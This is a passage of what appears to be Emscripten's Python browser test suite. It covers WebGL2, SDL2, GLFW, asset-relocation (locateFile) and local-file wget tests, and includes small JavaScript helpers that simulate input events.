    self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
  self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')

# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
  for opts in [[], ['-s', 'FULL_ES2=1']]:
    print(opts)
    self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')

# NOTE(review): unlike the neighboring WebGL tests, this one is not marked
# @requires_graphics_hardware - confirm that is intentional.
def test_webgl2(self):
  # WebGL2 smoke test under several build configurations.
  for opts in [
    ['-s', 'MIN_CHROME_VERSION=0'],
    ['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
    ['-s', 'FULL_ES2=1'],
  ]:
    print(opts)
    self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + opts, expected='0')

@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
  # test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
  # (the testcase doesn't even use threads, but is compiled with thread support).
  self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-s', 'USE_PTHREADS'], expected='0')

def test_webgl2_objects(self):
  self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')

def test_html5_webgl_api(self):
  # html5.h WebGL API in OffscreenCanvas, offscreen-framebuffer, and default
  # modes; OffscreenCanvas is skipped when the environment lacks support.
  for mode in [['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
               ['-s', 'OFFSCREEN_FRAMEBUFFER', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'],
               []]:
    if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
      continue
    self.btest(path_from_root('tests', 'html5_webgl.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'] + mode, expected='0')

def test_webgl2_ubos(self):
  self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
  # Run once with WebGL2 enabled and once with the default (WebGL1) build.
  self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'], expected='1')
  self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')

@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
  self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')

@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
  # tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
  # but context creation fails, that we can then manually try to create a
  # WebGL1 context and succeed.
  self.btest(path_from_root('tests', 'test_webgl2_runtime_no_context.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='1')

@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
  self.btest(path_from_root('tests', 'webgl2_invalid_teximage2d_type.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2'], expected='0')

@requires_graphics_hardware
def test_webgl_with_closure(self):
  self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'MAX_WEBGL_VERSION=2', '--closure', '1', '-lGL'], expected='0')

# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
  self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2', '-s', 'GL_ASSERTIONS'], expected='0')

@requires_graphics_hardware
def test_webgl2_pbo(self):
  self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'], expected='0')

# --- sokol-based WebGL2 rendering tests, compared to reference images. ---

@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
  self.btest(path_from_root('tests', 'third_party', 'sokol', 'mipmap-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL', '-O1'],
             reference=os.path.join('third_party', 'sokol', 'mipmap-emsc.png'), reference_slack=2)

@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
  self.btest(path_from_root('tests', 'third_party', 'sokol', 'mrt-emcc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
             reference=os.path.join('third_party', 'sokol', 'mrt-emcc.png'))

@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
  self.btest(path_from_root('tests', 'third_party', 'sokol', 'arraytex-emsc.c'), args=['-s', 'MAX_WEBGL_VERSION=2', '-lGL'],
             reference=os.path.join('third_party', 'sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
  # Touch events through SDL; AUTOMATE_SUCCESS makes the testcase drive the
  # events itself.
  for opts in [[], ['-O2', '-g1', '--closure', '1']]:
    print(opts)
    self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')

def test_html5_mouse(self):
  for opts in [[], ['-O2', '-g1', '--closure', '1']]:
    print(opts)
    self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')

def test_sdl_mousewheel(self):
  for opts in [[], ['-O2', '-g1', '--closure', '1']]:
    print(opts)
    self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')

def test_wget(self):
  # emscripten_wget of a local file; requires the async (ASYNCIFY-style) args.
  create_test_file('test.txt', 'emscripten')
  self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())

def test_wget_data(self):
  create_test_file('test.txt', 'emscripten')
  self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
def test_locate_file(self):
    """Verify Module.locateFile redirects loading of generated assets
    (.wasm / .html.mem / file-packager .data) into a subdirectory.

    Covered both via a --pre-js that sets Module.locateFile and via a
    custom HTML shell defining it, for wasm and non-wasm (asm.js) builds.
    """
    for wasm in [0, 1]:
        print('wasm', wasm)
        self.clear()
        # C program that reads the packaged data file and checks its contents.
        create_test_file('src.cpp', r'''
            #include <stdio.h>
            #include <string.h>
            #include <assert.h>
            int main() {
              FILE *f = fopen("data.txt", "r");
              assert(f && "could not open file");
              char buf[100];
              int num = fread(buf, 1, 20, f);
              assert(num == 20 && "could not read 20 bytes");
              buf[20] = 0;
              fclose(f);
              int result = !strcmp("load me right before", buf);
              printf("|%s| : %d\n", buf, result);
              REPORT_RESULT(result);
              return 0;
            }
        ''')
        create_test_file('data.txt', 'load me right before...')
        create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
        # NOTE(review): the stdout file handle opened here is never explicitly
        # closed — relies on CPython refcounting; harmless in a test but untidy.
        self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
        # put pre.js first, then the file packager data, so locateFile is there for the file loading code
        self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)])
        ensure_dir('sub')
        # Move the generated binary assets into sub/ so only locateFile can find them.
        if wasm:
            shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
        else:
            shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
        shutil.move('test.data', os.path.join('sub', 'test.data'))
        self.run_browser('page.html', None, '/report_result?1')

        # alternatively, put locateFile in the HTML
        print('in html')
        create_test_file('shell.html', '''
            <body>
              <script>
                var Module = {
                  locateFile: function(x) { return "sub/" + x }
                };
              </script>
              {{{ SCRIPT }}}
            </body>
        ''')

        def in_html(expected, args=[]):
            # Build with the custom shell, relocate assets, then check the result.
            self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP', '-s', 'ASSERTIONS', '-s', 'FORCE_FILESYSTEM', '-s', 'WASM=' + str(wasm)] + args)
            if wasm:
                shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
            else:
                shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
            self.run_browser('page.html', None, '/report_result?' + expected)

        in_html('1')

        # verify that the mem init request succeeded in the latter case
        if not wasm:
            create_test_file('src.cpp', r'''
                #include <stdio.h>
                #include <emscripten.h>
                int main() {
                  int result = EM_ASM_INT({
                    return Module['memoryInitializerRequest'].status;
                  });
                  printf("memory init request: %d\n", result);
                  REPORT_RESULT(result);
                  return 0;
                }
            ''')
            # 200 == HTTP OK for the memory initializer XHR.
            in_html('200')
@requires_graphics_hardware
@parameterized({
    'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
    'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
    # GLFW3 support, with and without a GL client API, across opt levels.
    for opts in [[], ['-s', 'LEGACY_GL_EMULATION'], ['-Os', '--closure', '1']]:
        print(opts)
        self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')

@requires_graphics_hardware
def test_glfw_events(self):
    # GLFW input events under both the GLFW2 and GLFW3 emulation layers.
    self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
    self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
    # load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
    for mem in [0, 1]:
        # Preload at the root and at a nested virtual path.
        for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
                                        ('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
            self.compile_btest([
                path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
                '--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
            ])
            self.run_browser('page.html', '', '/report_result?600')

@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
    # Same as above but exercising the .jpeg (long) extension.
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
    self.compile_btest([
        path_from_root('tests', 'sdl2_image.c'), '-o', 'page.html',
        '--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
    ])
    self.run_browser('page.html', '', '/report_result?600')

@requires_graphics_hardware
def test_sdl2_image_formats(self):
    # SDL2_IMAGE_FORMATS selects which codecs get built into the port.
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
    self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
                                                     '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
    self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
                                                     '-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
    # SDL2 keyboard input: the pre-js pumps the app (Module._one) each frame
    # and defines JS helpers that synthesize keydown/keypress/keyup events.
    create_test_file('pre.js', '''
        Module.postRun = function() {
          function doOne() {
            Module._one();
            setTimeout(doOne, 1000/60);
          }
          setTimeout(doOne, 1000/60);
        }

        function keydown(c) {
          var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
          var prevented = !document.dispatchEvent(event);

          //send keypress if not prevented
          if (!prevented) {
            var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
            document.dispatchEvent(event);
          }
        }

        function keyup(c) {
          var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
          document.dispatchEvent(event);
        }
    ''')
    self.compile_btest([path_from_root('tests', 'sdl2_key.c'), '-o', 'page.html', '-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
    self.run_browser('page.html', '', '/report_result?37182145')

def test_sdl2_text(self):
    # SDL2 text input via synthesized keypress events on document.body.
    create_test_file('pre.js', '''
        Module.postRun = function() {
          function doOne() {
            Module._one();
            setTimeout(doOne, 1000/60);
          }
          setTimeout(doOne, 1000/60);
        }

        function simulateKeyEvent(c) {
          var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
          document.body.dispatchEvent(event);
        }
    ''')
    self.compile_btest([path_from_root('tests', 'sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
    self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
    # SDL2 mouse input: the pre-js synthesizes mousedown/mouseup (button >= 0)
    # or mousemove (button < 0) events at canvas-relative coordinates.
    # NOTE(review): the first `var event` below is never used — dead code in
    # the generated JS, kept as-is since this is runtime string content.
    create_test_file('pre.js', '''
        function simulateMouseEvent(x, y, button) {
          var event = document.createEvent("MouseEvents");
          if (button >= 0) {
            var event1 = document.createEvent("MouseEvents");
            event1.initMouseEvent('mousedown', true, true, window,
                       1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
                       0, 0, 0, 0,
                       button, null);
            Module['canvas'].dispatchEvent(event1);
            var event2 = document.createEvent("MouseEvents");
            event2.initMouseEvent('mouseup', true, true, window,
                       1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
                       0, 0, 0, 0,
                       button, null);
            Module['canvas'].dispatchEvent(event2);
          } else {
            var event1 = document.createEvent("MouseEvents");
            event1.initMouseEvent('mousemove', true, true, window,
                       0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
                       0, 0, 0, 0,
                       0, null);
            Module['canvas'].dispatchEvent(event1);
          }
        }
        window['simulateMouseEvent'] = simulateMouseEvent;
    ''')
    self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
    self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
    # Like test_sdl2_mouse, but with the canvas positioned inside an offset
    # container in a custom HTML page, so SDL must correct for the canvas
    # offset (events here use page coordinates, not canvas-relative ones).
    create_test_file('pre.js', '''
        function simulateMouseEvent(x, y, button) {
          var event = document.createEvent("MouseEvents");
          if (button >= 0) {
            var event1 = document.createEvent("MouseEvents");
            event1.initMouseEvent('mousedown', true, true, window,
                       1, x, y, x, y,
                       0, 0, 0, 0,
                       button, null);
            Module['canvas'].dispatchEvent(event1);
            var event2 = document.createEvent("MouseEvents");
            event2.initMouseEvent('mouseup', true, true, window,
                       1, x, y, x, y,
                       0, 0, 0, 0,
                       button, null);
            Module['canvas'].dispatchEvent(event2);
          } else {
            var event1 = document.createEvent("MouseEvents");
            event1.initMouseEvent('mousemove', true, true, window,
                       0, x, y, x, y,
                       0, 0, 0, 0,
                       0, null);
            Module['canvas'].dispatchEvent(event1);
          }
        }
        window['simulateMouseEvent'] = simulateMouseEvent;
    ''')
    # Hand-written page: the canvas lives in a container offset by 5px.
    create_test_file('page.html', '''
        <html>
          <head>
            <style type="text/css">
              html, body { margin: 0; padding: 0; }
              #container {
                position: absolute;
                left: 5px; right: 0;
                top: 5px; bottom: 0;
              }
              #canvas {
                position: absolute;
                left: 0; width: 600px;
                top: 0; height: 450px;
              }
              textarea {
                margin-top: 500px;
                margin-left: 5px;
                width: 600px;
              }
            </style>
          </head>
          <body>
            <div id="container">
              <canvas id="canvas"></canvas>
            </div>
            <textarea id="output" rows="8"></textarea>
            <script type="text/javascript">
              var Module = {
                canvas: document.getElementById('canvas'),
                print: (function() {
                  var element = document.getElementById('output');
                  element.value = ''; // clear browser cache
                  return function(text) {
                    if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
                    element.value += text + "\\n";
                    element.scrollTop = element.scrollHeight; // focus on bottom
                  };
                })()
              };
            </script>
            <script type="text/javascript" src="sdl2_mouse.js"></script>
          </body>
        </html>
    ''')
    self.compile_btest([path_from_root('tests', 'sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
    self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
    # SDL2 together with pthreads, main() proxied to a pthread.
    self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD'])

@requires_graphics_hardware
def test_sdl2glshader(self):
    # GL shaders via SDL2 with legacy GL emulation; once with closure,
    # once proxied (closure fails when combined with proxying).
    self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION'])
    self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy

@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
    # Reftest: a blank SDL2 canvas.
    self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])

@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
    # Reftest: paletted rendering on an SDL2 canvas.
    self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])

@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
    # Reftest: drawing to the canvas twice.
    self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])

@requires_graphics_hardware
def test_sdl2_gfx(self):
    # Reftest for the SDL2_gfx port (small pixel tolerance allowed).
    self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
    # Paletted canvas driven by argv: each pre-js selects a color channel
    # (-r / -g / -b) and the output is compared to the matching reference.
    create_test_file('args-r.js', '''
        Module['arguments'] = ['-r'];
    ''')
    create_test_file('args-g.js', '''
        Module['arguments'] = ['-g'];
    ''')
    create_test_file('args-b.js', '''
        Module['arguments'] = ['-b'];
    ''')
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
    self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])

def test_sdl2_swsurface(self):
    # Software-surface rendering; needs extra heap for the surface.
    self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'INITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
    # load an image file, get pixel data.
    # Copied to a '.not' extension so decoding can't rely on the file name.
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
    self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)

@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
    # load an image file, get pixel data (from an in-memory buffer).
    shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
    self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
    # SDL2 rendering from a worker (--proxy-to-worker): the post-build hook
    # injects reftest.js and delays window.close until frames have rendered.
    def post():
        html = open('test.html').read()
        html = html.replace('</body>', '''
            <script>
              function assert(x, y) { if (!x) throw 'assertion failed ' + y }
              %s

              var windowClose = window.close;
              window.close = function() {
                // wait for rafs to arrive and the screen to update before reftesting
                setTimeout(function() {
                  doReftest();
                  setTimeout(windowClose, 5000);
                }, 1000);
              };
            </script>
            </body>''' % open('reftest.js').read())
        create_test_file('test.html', html)

    create_test_file('data.txt', 'datum')
    self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
    # key events should be detected using SDL_PumpEvents
    create_test_file('pre.js', '''
        function keydown(c) {
          var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
          document.dispatchEvent(event);
        }
    ''')
    self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])

def test_sdl2_timer(self):
    # SDL2 timer callbacks.
    self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])

def test_sdl2_canvas_size(self):
    # Querying/settings the SDL2 canvas size.
    self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])

@requires_graphics_hardware
def test_sdl2_gl_read(self):
    # SDL, OpenGL, readPixels
    self.compile_btest([path_from_root('tests', 'sdl2_gl_read.c'), '-o', 'something.html', '-s', 'USE_SDL=2'])
    self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
    # Legacy GL matrix-mode texture transforms via SDL2; reftest.
    self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
               args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
               message='You should see a (top) red-white and (bottom) white-red image.')

@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
    # glDrawElements with the various GL primitive modes; reftest.
    self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
               args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_SDL=2'],
               message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')

@requires_graphics_hardware
def test_sdl2_fog_simple(self):
    # Legacy-GL fog, simple mode; reftest against a fogged screenshot.
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')

@requires_graphics_hardware
def test_sdl2_fog_negative(self):
    # Fog with negative parameters.
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')

@requires_graphics_hardware
def test_sdl2_fog_density(self):
    # GL_FOG_DENSITY handling.
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')

@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
    # GL_EXP2 fog mode.
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')

@requires_graphics_hardware
def test_sdl2_fog_linear(self):
    # GL_LINEAR fog mode (small pixel tolerance allowed).
    shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
    self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
               args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins'],
               message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
    # SDL2 should not perform wasteful extra work per frame.
    self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])

def test_sdl2_canvas_write(self):
    # Writing pixels directly to the SDL2 canvas.
    self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])

@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
    # GL frame swapping: strip the postRun reftest hook so the comparison
    # happens on a later frame, not the very first one.
    def post_build(*args):
        self.post_manual_reftest(*args)
        html = open('test.html').read()
        html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
        assert html != html2
        create_test_file('test.html', html2)
    self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
    # SDL2_ttf font rendering with an embedded TTF file; reftest.
    shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
    self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
               args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
               message='You should see colorful "hello" and "world" in the window')

def test_sdl2_custom_cursor(self):
    # SDL_CreateColorCursor from a preloaded BMP.
    shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
    self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])

def test_sdl2_misc(self):
    # Assorted small SDL2 API checks; expects a clean exit code 0.
    self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2'])

@disabled('https://github.com/emscripten-core/emscripten/issues/13101')
def test_sdl2_misc_main_module(self):
    # Same as test_sdl2_misc but built as a MAIN_MODULE (currently disabled).
    self.btest_exit('sdl2_misc.c', 0, args=['-s', 'USE_SDL=2', '-s', 'MAIN_MODULE'])

def test_sdl2_misc_via_object(self):
    # Two-step build: compile to an object file first, then link for the browser.
    self.run_process([EMCC, '-c', path_from_root('tests', 'sdl2_misc.c'), '-s', 'USE_SDL=2', '-o', 'test.o'])
    self.compile_btest(['test.o', '-s', 'EXIT_RUNTIME', '-s', 'USE_SDL=2', '-o', 'test.html'])
    self.run_browser('test.html', '...', '/report_result?exit:0')
@parameterized({
    'dash_s': (['-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2'],),
    'dash_l': (['-lSDL2', '-lSDL2_mixer'],),
})
@requires_sound_hardware
def test_sdl2_mixer_wav(self, flags):
    # SDL2_mixer WAV playback; the port can be selected via -s or -l flags.
